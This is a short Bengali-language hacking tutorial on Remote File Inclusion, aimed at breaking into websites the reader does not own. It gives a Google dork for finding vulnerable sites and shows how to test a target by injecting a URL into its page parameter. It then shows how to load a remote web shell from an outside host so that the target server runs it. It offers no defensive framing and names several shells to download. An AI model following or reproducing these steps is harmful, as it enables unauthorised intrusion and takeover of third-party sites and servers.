Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি। যা ওয়েব এপ্লিকেশনে পাওয়া যায়। এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে। যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে। এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব। সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়। উদাহারণঃ http://www.Targetsite.com/index.?page=index. এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে “inurl:index.?page=” এই Dork টি index.?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে। যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে ?page= এর পর www.google.com এড করে এন্টার চাপুন। উদাহারণঃ www.targetsite.com/index.?page=www.google.com যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.?page=index. তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ http://www.example.com/v2/index.?page=http://google.com/ যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে। মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল। যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন! এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া। শেল ডাউনলোড করার জন্যে গুগল করতে পারেন। (madspot -shell download)(wso -shell download) (b347k -shell download) Etc… যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না। শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে সেটার জন্যে গুগলে সার্চ করুন। c99 -shell.txt http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক) এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে। http://www.vuln.rfisite.com/v2/index.?page=http://www.c99txt.net/s/c99.txt ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।

Read More